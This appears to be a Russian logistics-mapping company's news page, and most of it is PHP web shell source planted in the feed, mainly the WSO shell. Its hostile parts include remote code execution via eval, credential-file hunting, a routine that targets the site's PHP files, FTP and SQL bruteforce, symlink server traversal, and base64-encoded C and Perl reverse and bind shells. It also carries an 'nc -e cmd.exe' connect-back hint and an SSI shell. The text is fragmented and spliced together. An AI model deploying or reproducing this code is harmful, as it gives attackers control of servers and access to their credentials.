0000-00-00
"dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else
$aliases = array(
"List dir" => "ls -la",
"list file attributes on a Linux second extended file system" =>
"lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" => "find . -type f -name
\"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm
-2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name
service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name
.htpasswd",
"find all .bash_history files" => "find / -type f -name
.bash_history",
"find .bash_history files in current dir" => "find . -type f -name
.bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name
.fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files"=>"locate '.conf'",
"locate .pwd files" => "locate '.pwd'",
"locate .sql files" => "locate '.sql'",
"locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'",
"locate .mysql_history files" => "locate '.mysql_history'",
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv"
);
function printHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = "UTF-8";
global $color;
?>
<?=$_SERVER['HTTP_HOST']?> -
WSO <?=VERSION?>
".$path[$i]."/";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '
'.$item.' ';
$m = array('Sec.
Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql
'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String
tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Domain
s'=>'Domains');
if(!empty($GLOBALS['auth_pass']))
$m['Logout'] = 'Logout';
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach($m as $k => $v)
$menu .= '
[ '.$k.' ] ';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach( range('a','z') as $drive )
if (is_dir($drive.':\\'))
$drives .= '
[ '.$drive.' ] ';
}
echo '
Uname: '.substr(@php_uname(), 0, 120).' [Google] [Exploit-
Git] Group: '.$gid.' (
'.$group.' )Safe mode: '.
($GLOBALS['safe_mode']?'ON ':'OFF [ phpinfo ] Datetime:
'.date('Y-m-d H:i:s').'Free:
'.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
[ home ]
'.$opt_charsets.' Server IP:
Client IP:
'.
'
';
}
function printFooter() {
$is_writable = is_writable($GLOBALS['cwd'])?"[
Writeable ] ":"[ Not writable ] ";
?>
= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function perms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' :
'-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' :
'-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' :
'-'));
return $i;
}
function viewPermsColor($f) {
if (!@is_readable($f))
return ''.perms(@fileperms($f)).'
'.perms(@fileperms($f)).'
'.perms(@fileperms($f)).'
Server security information ';
function showSecParam($n, $v) {
$v = trim($v);
if($v) {
echo '
'.$n.': ';
if(strpos($v, "\n") === false)
echo $v.'
';
else
echo '
'.$v.' ';
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
showSecParam('Disabled PHP Functions',
($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir',
@ini_get('safe_mode_include_dir'));
showSecParam('cURL support',
function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
showSecParam('Supported databases', implode(', ', $temp));
echo '
';
if( $GLOBALS['os'] == 'nix' ) {
$userful =
array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','
nc','locate','suidperl');
$danger =
array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootki
t','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg
','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-
mirror');
showSecParam('Readable /etc/passwd',
@is_readable('/etc/passwd')?"yes
[view] ":'no');
showSecParam('Readable /etc/shadow',
@is_readable('/etc/shadow')?"yes
[view] ":'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']) {
echo '
';
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Downloaders', implode(', ',$temp));
echo '
';
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('HDD space', ex('df -h'));
showSecParam('Mount options',
@file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version',ex('ver'));
showSecParam('Account Settings',ex('net accounts'));
showSecParam('User Accounts',ex('net user'));
}
echo '
PHP info ';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!body {.*}!msiU','',$tmp);
$tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
$tmp = preg_replace('!h1!msiU','h2',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th
{$1}',$tmp);
$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
echo $tmp;
echo '
Execution PHP-code ';
if(!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo ' File manager ';
if(isset($_POST['p1'])) {
switch($_POST['p1']) {
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'],
$_FILES['f']['name']))
echo "Can't upload file!";
break;
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") ||
(basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f) {
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_SESSION['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f,
$d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['cwd'],$f,
$GLOBALS['cwd']);
} elseif($_SESSION['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f,
$d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['cwd'].$f,
$GLOBALS['cwd'].$f);
}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['p1']) && (($_POST['p1'] ==
'copy')||($_POST['p1'] == 'move')) ) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach($_SESSION['f'] as $k => $f)
$_SESSION['f'][$k] = urldecode($f);
$_SESSION['cwd'] = @$_POST['c'];
}
break;
}
echo
'';
}
$dirContent = @scandir(isset($_POST['c'])?
$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d)!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
?>
';
$stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "
";
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo" Search for hash:
File tools';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo '
Name: '.htmlspecialchars($_POST['p1']).'
Size: '.(is_file($_POST['p1'])?
viewSize(filesize($_POST['p1'])):'-').'
Permission:
'.viewPermsColor($_POST['p1']).'
Owner/Group:
'.$uid['name'].'/'.$gid['name'].'
';
echo '
Create time: '.date('Y-m-d
H:i:s',filectime($_POST['p1'])).'
Access time: '.date('Y-m-d
H:i:s',fileatime($_POST['p1'])).'
Modify time: '.date('Y-m-d
H:i:s',filemtime($_POST['p1'])).'
';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit',
'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo '
'.
((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ] ':$v).' ';
echo '
';
switch($_POST['p2']) {
case 'view':
echo '
';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo ' ';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '
';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array(''),
array(''),$code).'
';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8,
(strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!
';
else
die('');
}
echo '
';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
@file_put_contents($_POST['p1'],$_POST['p3']);
echo 'Saved!
';
}
echo '
';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000
','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ' '; break;
case 9: $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .=
sprintf('%08X',$i+1).'
';}
$h[1] .= '
';
$h[2] .= "\n";
}
}
echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!
';
else
die('');
}
echo '
';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('');
else {
echo 'Fail!
';
}
} else echo 'Bad time format!
';
}
echo '
';
break;
case 'mkfile':
break;
}
echo '
Safe mode bypass ';
echo '
Copy (read file) Glob
(list dir) Curl (read file)
Ini_restore (read file)
Posix_getpwuid ("Read" /etc/passwd) Imap_open (read file) ';
if($temp)
echo '
'.$temp.' ';
echo '
';
printFooter();
}
function actionLogout() {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo 'bye!';
}
function actionSelfRemove() {
printHeader();
if($_POST['p1'] == 'yes') {
if(@unlink(SELF_PATH))
die('Shell has been removed');
else
echo 'unlink error!';
}
echo 'Suicide Really want to remove the
shell?
Yes #Domains & Users ";
mkdir("sym");
symlink("/","0/x.txt");
$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n
AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler
txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy
Any";
$f = fopen ('sym/.htaccess','w');
fwrite($f , $c);
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ die("#Error... -> [ /etc/named.conf ]"); }
echo "
Domain User List Symlink
".$domains[1][0]."
".$user['name']." Miremos
FailRoot'Cod3rz FailRoot-
Sec.Com | wWw.sEc4EvEr.CoM
";
printFooter();
}
function actionInfect() {
printHeader();
echo 'Infect ';
if($_POST['p1'] == 'infect') {
$target=$_SERVER['DOCUMENT_ROOT'];
function ListFiles($dir) {
if($dh = opendir($dir)) {
$files = Array();
$inner_files = Array();
while($file = readdir($dh)) {
if($file != "." && $file != "..") {
if(is_dir($dir . "/" . $file)) {
$inner_files = ListFiles($dir . "/" .
$file);
if(is_array($inner_files)) $files =
array_merge($files, $inner_files);
} else {
array_push($files, $dir . "/" .
$file);
}
}
}
closedir($dh);
return $files;
}
}
foreach (ListFiles($target) as $key=>$file){
$nFile = substr($file, -4, 4);
if($nFile == ".php" ){
if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&
(is_writeable($file))){
echo "$file
";
$i++;
}
}
}
echo "
$i ";
}else{
echo "
";
echo 'Really want to infect the server?
Yes Results Type:
'.htmlspecialchars($_POST['proto']).' Server:
'.htmlspecialchars($_POST['server']).''.htmlspecialchars($line[0]).' :'.htmlspecialchars($line[0]).''.htmlspecialchars($line[0]).' :'.htmlspecialchars($tmp);
}
}
}
} elseif($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( bruteForce($server[0],@$server[1],
$_POST['login'], $line) ) {
$success++;
echo
''.htmlspecialchars($_POST['login']).' :'.htmlspecialchars($line).'Attempts: $attempts Success:
$success
FTP bruteforce Sql browser
";
if(@$_POST['p1'] == 'loadfile') {
$db->query("SELECT
LOAD_FILE('".addslashes($_POST['p2'])."') as file");
$file = $db->fetch();
echo '
'.htmlspecialchars($file['file']).' ';
}
}
echo '
';
printFooter();
}
function actionNetwork() {
printHeader();
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3N
vY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCB
hcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0
IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2lu
X2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYX
RvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfY
WRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1N
UUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChz
dHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikp
KTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAg
IHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZ
kLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWk
iKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGR
yPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZ
GRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I
6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2Nr
ZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCB
kaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm
9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0N
LRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2
xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nL
mg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4N
CiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICo
qYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN
0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgP
SBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV
0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5
fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19h
ZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN
0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3
aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZ
HVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYy
wyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgc
mVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbih
wKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV
0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgI
CAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5
c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0
KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29j
a2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3An
KSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFM
sU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfa
W4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcn
RcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7D
Qp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcm
spKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsN
CgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQ
oJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWU
gcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09
OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
?>
Network tools
$out\n".ex("ps aux | grep bp")."
";
}
if($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl",$bind_port_p);
$out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
echo "
$out\n".ex("ps aux | grep bp.pl")."
";
}
if($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c",$back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
echo "
$out\n".ex("ps aux | grep bc")."
";
}
if($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl",$back_connect_p);
$out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']."
".$_POST['p3']." &");
echo "
$out\n".ex("ps aux | grep bc.pl")."
";
}
}
echo '
';
printFooter();
}
if( empty($_POST['a']) )
if(isset($default_action) && function_exists('action' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a']);
?>
2013-08-05
____ _ ____ _
_ _
| _ \ ___ ___ | |_ / ___|| |__ ___| | |
| |_) / _ \ / _ \| __| \___ \| '_ \ / _ \ | |
| _ < (_) | (_) | |_ _ ___) | | | | __/ | |
|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|
Safe Mode ON ';
} else {
print 'Safe Mode OFF
!
[ Server Info ]
Current Directory:
Shell:
Server Software: Server Name: Server Protocol:
[ Command Execute ]
[ File Upload ]
Info: For a
connect
back Shell, use: nc -e cmd.exe [SERVER] 3333 after local command: nc -v -l -p 3333 (Windows)
File already exist";
}
else
{
copy($file,"$filename");
if( file_exists($filename))
{
echo "File uploaded successful
";
}
elseif(! file_exists($filename))
{
echo "File not found
";
}
}
}
?>
[ Files & Directories ]
[ File Inclusion ]
2013-08-04
SSI Web Shell by BECHED
Common info GMT date
Local date
Document name
Document URI Last modified Owner
Command for shell display:none;>
Enter command
Result Executed command
Operations on files style=display:none;>View file (virtual include)
Included file Size bytes File modified at
(c) BECHED
2009-2011, v1.2
2013-01-01
В 2013 г. проекту TopPlan - 20 лет !!!
Всех с Новым годом!!!!
2010-07-29
В TopPlan подготовлены карты с самой полной адресной базой по Санкт-Петербургу и Ленинградской области – TopPlan 2011. – более 110000 адресов.
2010-07-22
TopPlan расширяет границы по Европе.
2010-07-15
В TopPlan подготовлены карты с самой полной адресной базой по Москве и Московской области – TopPlan 2011. – более 200000 адресов.
2010-06-29
В МЧС по СПб. и Л.О. установлена система TopPlan Professional для обеспечения работы противопожарной службы.
2010-04-04
Читайте статью "Оптимизация перевозок автомобильным транспортом"
о методах и способах оптимизации транспортной логистики.
2010-04-03
Пресса о нас. Современное состояние дел в автоматизации транспортной логистики.
В статье кратко анализируются программы транспортной логистики, наиболее эффективные методы автоматизации планирования доставки, и методы внедрения систем автоматизации транспортной логистики.
Читайте статью: >>
